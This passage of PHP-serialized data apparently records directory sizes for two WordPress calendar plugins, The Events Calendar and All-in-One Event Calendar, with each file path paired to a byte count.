;i:2265;s:90:\"/var/www/html/wp-content/plugins/the-events-calendar/src/admin-views/metabox/compatibility\";i:2265;s:87:\"/var/www/html/wp-content/plugins/the-events-calendar/src/admin-views/metabox/components\";i:1544;s:76:\"/var/www/html/wp-content/plugins/the-events-calendar/src/admin-views/metabox\";i:6492;s:76:\"/var/www/html/wp-content/plugins/the-events-calendar/src/admin-views/widgets\";i:460;s:87:\"/var/www/html/wp-content/plugins/the-events-calendar/src/admin-views/aggregator/origins\";i:47749;s:84:\"/var/www/html/wp-content/plugins/the-events-calendar/src/admin-views/aggregator/tabs\";i:19200;s:87:\"/var/www/html/wp-content/plugins/the-events-calendar/src/admin-views/aggregator/banners\";i:830;s:86:\"/var/www/html/wp-content/plugins/the-events-calendar/src/admin-views/aggregator/fields\";i:3629;s:79:\"/var/www/html/wp-content/plugins/the-events-calendar/src/admin-views/aggregator\";i:115200;s:68:\"/var/www/html/wp-content/plugins/the-events-calendar/src/admin-views\";i:223404;s:83:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/top-bar/nav\";i:3750;s:79:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/top-bar\";i:7992;s:114:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/mobile-events/mobile-day/mobile-event/date\";i:1579;s:109:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/mobile-events/mobile-day/mobile-event\";i:5973;s:96:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/mobile-events/mobile-day\";i:9835;s:89:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/mobile-events/nav\";i:4873;s:85:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/mobile-events\";i:19859;s:124:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/calendar-body/day/multiday-events/multiday-event/bar\";i:1585;s:132:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/calendar-body/day/multiday-events/multiday-event/hidden/link\";i:1620;s:127:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/calendar-body/day/multiday-events/multiday-event/hidden\";i:3582;s:120:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/calendar-body/day/multiday-events/multiday-event\";i:7358;s:105:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/calendar-body/day/multiday-events\";i:9961;s:125:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/calendar-body/day/calendar-events/calendar-event/date\";i:1416;s:133:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/calendar-body/day/calendar-events/calendar-event/tooltip/date\";i:1463;s:128:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/calendar-body/day/calendar-events/calendar-event/tooltip\";i:6535;s:120:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/calendar-body/day/calendar-events/calendar-event\";i:13642;s:105:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/calendar-body/day/calendar-events\";i:15046;s:89:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/calendar-body/day\";i:41621;s:85:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month/calendar-body\";i:44508;s:71:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/month\";i:76025;s:88:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/latest-past/event/date\";i:1522;s:83:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/latest-past/event\";i:9227;s:77:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/latest-past\";i:11556;s:92:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/components/top-bar/actions\";i:309;s:84:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/components/top-bar\";i:1526;s:94:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/components/events-bar/search\";i:2230;s:98:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/components/events-bar/views/list\";i:1382;s:93:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/components/events-bar/views\";i:2262;s:87:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/components/events-bar\";i:8167;s:92:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/components/subscribe-links\";i:4172;s:88:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/components/breadcrumbs\";i:1411;s:85:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/components/messages\";i:835;s:76:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/components\";i:31127;s:103:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/widgets/widget-events-list/event/date\";i:1019;s:98:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/widgets/widget-events-list/event\";i:4845;s:92:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/widgets/widget-events-list\";i:7427;s:73:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/widgets\";i:10764;s:81:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/day/top-bar/nav\";i:3726;s:77:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/day/top-bar\";i:7614;s:80:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/day/event/date\";i:1474;s:75:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/day/event\";i:7408;s:73:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/day/nav\";i:3542;s:69:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/day\";i:23659;s:82:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/list/top-bar/nav\";i:3906;s:78:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/list/top-bar\";i:9212;s:81:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/list/event/date\";i:1473;s:76:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/list/event\";i:9445;s:74:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/list/nav\";i:6185;s:70:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/list\";i:30018;s:110:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/event-status/single/event-statuses-container\";i:2495;s:85:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/event-status/single\";i:3410;s:91:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/event-status/status-label\";i:1699;s:78:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2/event-status\";i:5974;s:65:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/v2\";i:201808;s:68:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/month\";i:20455;s:75:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/single-event\";i:3969;s:75:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/blocks/parts\";i:10656;s:69:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/blocks\";i:24945;s:70:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/widgets\";i:4195;s:75:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/kitchen-sink\";i:12360;s:66:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/day\";i:11556;s:68:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/embed\";i:6496;s:67:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/list\";i:12459;s:75:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/modules/meta\";i:10870;s:70:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views/modules\";i:21399;s:62:\"/var/www/html/wp-content/plugins/the-events-calendar/src/views\";i:332198;s:84:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/images/datepicker\";i:11097;s:84:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/images/events-bar\";i:6972;s:84:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/images/aggregator\";i:270812;s:79:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/images/icons\";i:9988;s:85:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/images/tribe-theme\";i:897;s:73:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/images\";i:430590;s:75:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/js/views\";i:123557;s:73:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/js/app\";i:1695592;s:69:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/js\";i:2167168;s:88:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/css/app/event-website\";i:266;s:96:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/css/app/classic-event-details\";i:1;s:89:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/css/app/event-category\";i:1;s:89:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/css/app/event-datetime\";i:454;s:85:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/css/app/event-tags\";i:1;s:86:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/css/app/event-links\";i:563;s:86:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/css/app/event-venue\";i:1564;s:86:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/css/app/event-price\";i:520;s:90:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/css/app/event-organizer\";i:291;s:74:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/css/app\";i:42112;s:70:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/css\";i:331544;s:72:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources/icons\";i:239096;s:66:\"/var/www/html/wp-content/plugins/the-events-calendar/src/resources\";i:3168398;s:72:\"/var/www/html/wp-content/plugins/the-events-calendar/src/functions/utils\";i:2145;s:72:\"/var/www/html/wp-content/plugins/the-events-calendar/src/functions/views\";i:6623;s:80:\"/var/www/html/wp-content/plugins/the-events-calendar/src/functions/template-tags\";i:234385;s:85:\"/var/www/html/wp-content/plugins/the-events-calendar/src/functions/advanced-functions\";i:19338;s:66:\"/var/www/html/wp-content/plugins/the-events-calendar/src/functions\";i:265783;s:79:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Events/Legacy/Views/V1\";i:3308;s:76:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Events/Legacy/Views\";i:3308;s:70:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Events/Legacy\";i:3308;s:63:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Events\";i:3308;s:70:\"/var/www/html/wp-content/plugins/the-events-calendar/src/modules/icons\";i:11963;s:64:\"/var/www/html/wp-content/plugins/the-events-calendar/src/modules\";i:11963;s:70:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/JSON_LD\";i:12005;s:72:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Shortcode\";i:4707;s:73:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Customizer\";i:47000;s:71:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Importer\";i:58197;s:67:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Ajax\";i:192;s:72:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Revisions\";i:4627;s:82:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Event_Status/Models\";i:2230;s:100:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Event_Status/Compatibility/Filter_Bar\";i:10155;s:114:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Event_Status/Compatibility/Events_Control_Extension\";i:9800;s:89:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Event_Status/Compatibility\";i:19955;s:75:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Event_Status\";i:49709;s:75:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Linked_Posts\";i:20696;s:76:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Editor/Blocks\";i:14447;s:77:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Editor/Objects\";i:3454;s:78:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Editor/Template\";i:3894;s:69:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Editor\";i:53568;s:68:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Dates\";i:5721;s:74:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Collections\";i:2730;s:71:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Template\";i:61037;s:80:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Models/Post_Types\";i:13490;s:69:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Models\";i:13490;s:79:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Admin/Filter_Bar\";i:3351;s:75:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Admin/Notice\";i:9329;s:72:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Admin/Bar\";i:5986;s:68:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Admin\";i:41643;s:90:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/Customizer/Section\";i:49149;s:82:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/Customizer\";i:59648;s:82:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/Interfaces\";i:4057;s:89:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/Template/Settings\";i:4019;s:80:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/Template\";i:42696;s:84:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/Views/Traits\";i:38114;s:85:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/Views/Widgets\";i:9548;s:77:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/Views\";i:116919;s:79:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/Widgets\";i:24254;s:81:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/functions\";i:6348;s:87:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/iCalendar/Links\";i:21315;s:81:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/iCalendar\";i:29709;s:82:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/Repository\";i:47708;s:77:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/Query\";i:9560;s:77:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2/Utils\";i:26702;s:71:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views/V2\";i:640097;s:68:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Views\";i:640097;s:78:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Featured_Events\";i:1259;s:83:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Aggregator/Processes\";i:21480;s:80:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Aggregator/Record\";i:218609;s:77:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Aggregator/API\";i:20990;s:91:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Aggregator/REST/V1/Endpoints\";i:12250;s:81:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Aggregator/REST/V1\";i:14245;s:78:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Aggregator/REST\";i:14245;s:77:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Aggregator/CLI\";i:20153;s:78:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Aggregator/Tabs\";i:49801;s:73:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Aggregator\";i:515568;s:67:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Meta\";i:7822;s:72:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Validator\";i:8569;s:80:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Service_Providers\";i:18001;s:89:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Integrations/WPML/Views/V2\";i:4174;s:86:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Integrations/WPML/Views\";i:4174;s:80:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Integrations/WPML\";i:55092;s:89:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Integrations/ACF/resources\";i:880;s:79:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Integrations/ACF\";i:2105;s:82:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Integrations/Fusion\";i:3643;s:91:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Integrations/Hello_Elementor\";i:3253;s:83:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Integrations/X_Theme\";i:3236;s:75:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Integrations\";i:86156;s:69:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Google\";i:6451;s:78:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/REST/Interfaces\";i:2015;s:78:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/REST/V1/Headers\";i:4827;s:84:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/REST/V1/Documentation\";i:18012;s:80:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/REST/V1/Endpoints\";i:159081;s:80:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/REST/V1/Validator\";i:3214;s:70:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/REST/V1\";i:251703;s:67:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/REST\";i:253718;s:75:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Repositories\";i:75601;s:76:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Event_Tickets\";i:4983;s:68:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe/Utils\";i:2313;s:62:\"/var/www/html/wp-content/plugins/the-events-calendar/src/Tribe\";i:2687955;s:56:\"/var/www/html/wp-content/plugins/the-events-calendar/src\";i:6792653;s:57:\"/var/www/html/wp-content/plugins/the-events-calendar/lang\";i:8064726;s:52:\"/var/www/html/wp-content/plugins/the-events-calendar\";i:29872292;s:75:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/recaptcha\";i:8874;s:80:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/Extension\";i:60211;s:77:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/Loader\";i:13309;s:79:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/Function\";i:2489;s:77:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/Filter\";i:2409;s:82:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/TokenParser\";i:34668;s:91:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/Node/Expression/Test\";i:6061;s:93:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/Node/Expression/Filter\";i:1583;s:92:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/Node/Expression/Unary\";i:1212;s:93:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/Node/Expression/Binary\";i:12758;s:86:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/Node/Expression\";i:48255;s:75:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/Node\";i:92821;s:82:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/NodeVisitor\";i:20467;s:78:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/Sandbox\";i:4652;s:76:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig/Error\";i:1769;s:70:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/twig\";i:400432;s:72:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/minify\";i:22399;s:73:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor/lessphp\";i:129415;s:65:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/vendor\";i:561120;s:90:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/external_libs/locales\";i:30631;s:92:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/external_libs/bootstrap\";i:39659;s:82:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/external_libs\";i:342824;s:75:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/widget\";i:4516;s:95:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/scripts/calendar_feeds/ics\";i:5569;s:91:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/scripts/calendar_feeds\";i:5569;s:90:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/scripts/setting/cache\";i:702;s:84:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/scripts/setting\";i:702;s:85:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/scripts/calendar\";i:28605;s:82:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/scripts/event\";i:796;s:105:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/scripts/add_new_event/event_location\";i:5356;s:106:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/scripts/add_new_event/event_date_time\";i:8412;s:90:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/scripts/add_new_event\";i:15709;s:100:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/scripts/common_scripts/frontend\";i:26029;s:99:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/scripts/common_scripts/backend\";i:6703;s:91:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/scripts/common_scripts\";i:33940;s:76:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/scripts\";i:445455;s:81:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/libs/captcha\";i:1526;s:73:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/libs\";i:12578;s:74:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js/pages\";i:741002;s:68:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js\";i:1820233;s:74:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/js_cache\";i:0;s:88:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/gamma/img\";i:7595;s:89:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/gamma/twig\";i:0;s:88:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/gamma/css\";i:267190;s:84:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/gamma\";i:322512;s:88:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/umbra/img\";i:13473;s:89:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/umbra/twig\";i:0;s:88:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/umbra/css\";i:267446;s:89:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/umbra/less\";i:10303;s:84:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/umbra\";i:334779;s:89:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/img\";i:27696;s:108:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/twig/captcha/recaptcha\";i:279;s:108:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/twig/captcha/nocaptcha\";i:172;s:98:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/twig/captcha\";i:451;s:90:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/twig\";i:44408;s:89:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/css\";i:267190;s:100:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/less/bootstrap\";i:180638;s:98:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/less/plugins\";i:31097;s:103:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/less/font-awesome\";i:41698;s:90:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/less\";i:324171;s:90:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex/font\";i:677472;s:85:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/vortex\";i:1386868;s:88:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/plana/img\";i:7595;s:89:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/plana/twig\";i:0;s:88:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/plana/css\";i:269220;s:89:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/plana/less\";i:2253;s:84:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/plana\";i:324516;s:90:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/journey/img\";i:27696;s:109:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/journey/twig/captcha/recaptcha\";i:279;s:109:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/journey/twig/captcha/nocaptcha\";i:172;s:99:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/journey/twig/captcha\";i:451;s:91:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/journey/twig\";i:42660;s:90:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/journey/css\";i:266973;s:101:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/journey/less/bootstrap\";i:180449;s:99:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/journey/less/plugins\";i:31097;s:104:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/journey/less/font-awesome\";i:41698;s:91:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/journey/less\";i:323560;s:91:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/journey/font\";i:391972;s:86:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec/journey\";i:1540649;s:78:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/themes-ai1ec\";i:3909324;s:75:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/img\";i:1413564;s:84:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/twig/setting\";i:15891;s:89:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/twig/notification\";i:361;s:90:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/twig/theme-options\";i:1882;s:91:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/twig/widget-creator\";i:1953;s:89:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/twig/add-ons-list\";i:1085;s:86:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/twig/ticketing\";i:6144;s:85:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/twig/organize\";i:1687;s:90:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/twig/form-elements\";i:2207;s:76:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/twig\";i:37142;s:83:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/plugins/ics\";i:7807;s:89:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/plugins/suggested\";i:6042;s:79:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/plugins\";i:14936;s:83:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/css/plugins\";i:83;s:75:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/css\";i:229955;s:86:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/less/bootstrap\";i:180497;s:84:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/less/plugins\";i:24729;s:89:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/less/font-awesome\";i:41694;s:76:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/less\";i:262060;s:76:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin/font\";i:514683;s:71:\"/var/www/html/wp-content/plugins/all-in-one-event-calendar/public/admin\";i:2564689;s:65:\"/var/www/html/wp-content/pl